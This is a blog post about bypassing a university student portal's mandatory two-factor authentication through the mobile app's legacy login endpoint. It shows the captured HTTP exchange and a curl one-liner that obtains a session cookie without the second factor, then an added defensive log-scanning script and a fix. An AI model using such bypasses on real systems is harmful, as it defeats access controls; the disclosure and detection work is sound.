pythech's Blog

Not a hacker blog

Bilkent SRS Two-Factor Authentication Bypass

Starting this semester, our school requires Two-Factor Authentication via SMS or e-mail for our “student management system” of sorts. While it sounds like a good idea, it is mandatory: there is no way to opt out or disable it. And sometimes it takes minutes to receive the code, which is very annoying for a quick visit or when you don’t have much time.

Technically, it’s actually Two-Step Verification, but nobody cares about the difference between the two these days, right? At least that’s what the website calls it. Anyway, I didn’t really do anything fancy, it’s just common sense: why does the website require an SMS code while the mobile app for SRS works perfectly as is? You’d expect the mobile app to get limited privileges, an API, etc., but nope, it’s just a plain HTML renderer. What this means is that it somehow logs in to the website without using the 2FA. In fact I’m not the one bypassing it, it’s the LEGACY CODE!

Phew, that was hard. A simple local proxy solves the mystery; this is the login request the app sends, followed by the server’s response:

POST /srs/ajax/login.php HTTP/1.1
Host: stars.bilkent.edu.tr
Content-Type: application/x-www-form-urlencoded
Connection: keep-alive
Accept: */*
User-Agent: Bilkent STARS/1.8.1 (iPhone; iOS 9.3.3; Scale/2.00)
Accept-Language: en-TR;q=1, tr-TR;q=0.9
Accept-Encoding: gzip, deflate
Content-Length: REDACTED

ID=REDACTED&PWD=REDACTED
HTTP/1.1 200 OK
Date: Sun, 23 Oct 2016 12:02:17 GMT
Server: Apache/2.2.16 (Debian)
X-Powered-By: PHP/5.3.29-1~dotdeb.0
Set-Cookie: PHPSESSID=REDACTED; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 4
Keep-Alive: timeout=1, max=300
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

HOME

Now all you have to do is

curl -i -s -X POST \
    --data-binary 'ID=<YOUR_ID>&PWD=<YOUR_PASSWORD>' \
    'https://stars.bilkent.edu.tr/srs/ajax/login.php' | grep PHPSESSID | cut -c 23-48

and use the extracted PHPSESSID cookie in your browser of choice.
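From the defender’s side, the lesson of the captured exchange is that every login path has to enforce the same second step; until the legacy endpoint is fixed or retired, the operator at least wants to know which sessions were minted through it. The following script is an added example and is not code from this post or from the SRS project: it scans Apache access log lines (the “combined” format is an assumption, as is the server’s logging at all) and flags successful POSTs to /srs/ajax/login.php. The success heuristic, a 200 response with a 4-byte body, comes from the HOME reply captured above and is an assumption about what a failed login would not return; the sample log lines are constructed.

```python
"""Flag logins that went through the legacy (non-2FA) endpoint in Apache access logs.

Added example, not from the original post. The log format (Apache "combined"),
the success heuristic (status 200 with a 4-byte "HOME" body) and all sample
lines are assumptions / constructed data.
"""
import re
from collections import Counter

# Apache "combined" log format (assumed for the server in the post).
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\d+|-) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)

LEGACY_LOGIN_PATH = "/srs/ajax/login.php"   # endpoint seen in the captured request
APP_UA_PREFIX = "Bilkent STARS/"            # user agent of the official mobile app
SUCCESS_BODY_SIZE = 4                       # the 4-byte "HOME" reply seen on success (assumed marker)

# Constructed sample lines: addresses, timestamps and sizes are made up.
SAMPLE_LOG = """\
203.0.113.10 - - [23/Oct/2016:12:02:17 +0000] "POST /srs/ajax/login.php HTTP/1.1" 200 4 "-" "Bilkent STARS/1.8.1 (iPhone; iOS 9.3.3; Scale/2.00)"
203.0.113.11 - - [23/Oct/2016:12:05:01 +0000] "POST /srs/ajax/login.php HTTP/1.1" 200 4 "-" "curl/7.47.0"
203.0.113.12 - - [23/Oct/2016:12:06:30 +0000] "POST /srs/ajax/login.php HTTP/1.1" 200 57 "-" "curl/7.47.0"
203.0.113.13 - - [23/Oct/2016:12:07:12 +0000] "POST /srs/login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
203.0.113.14 - - [23/Oct/2016:12:08:45 +0000] "GET /srs/ajax/login.php HTTP/1.1" 200 4 "-" "Bilkent STARS/1.8.1 (iPhone; iOS 9.3.3; Scale/2.00)"
"""


def parse_line(line):
    """Return the named fields of one combined-format line, or None if it does not parse."""
    m = LOG_RE.match(line.strip())
    return m.groupdict() if m else None


def is_legacy_login_success(rec):
    """True when the record looks like a session issued by the legacy endpoint without 2FA."""
    if rec["method"] != "POST" or rec["path"] != LEGACY_LOGIN_PATH:
        return False
    if rec["status"] != "200" or rec["size"] == "-":
        return False
    return int(rec["size"]) == SUCCESS_BODY_SIZE


def find_legacy_logins(log_text):
    """Collect every legacy-endpoint login, noting whether it came from the official app UA."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None or not is_legacy_login_success(rec):
            continue
        hits.append({
            "ip": rec["ip"],
            "time": rec["ts"],
            "ua": rec["ua"],
            "from_app": rec["ua"].startswith(APP_UA_PREFIX),
        })
    return hits


def summarize(log_text):
    """Count legacy logins by origin: 'app' (official client UA) vs 'non_app' (anything else)."""
    counts = Counter()
    for hit in find_legacy_logins(log_text):
        counts["app" if hit["from_app"] else "non_app"] += 1
    return counts


if __name__ == "__main__":
    for hit in find_legacy_logins(SAMPLE_LOG):
        tag = "app" if hit["from_app"] else "NON-APP"
        print(f"{hit['time']}  {hit['ip']:<15}  [{tag}]  {hit['ua']}")
    print(dict(summarize(SAMPLE_LOG)))
```

The user-agent split is only a triage hint, since the header is trivially set by any client; its real value is that any legacy login at all is evidence the second factor is not being enforced uniformly. The durable fix is to make /srs/ajax/login.php issue the same pre-authentication session the web form does, so the SMS or e-mail step is required before the session becomes usable, or to remove the endpoint and give the app a proper API.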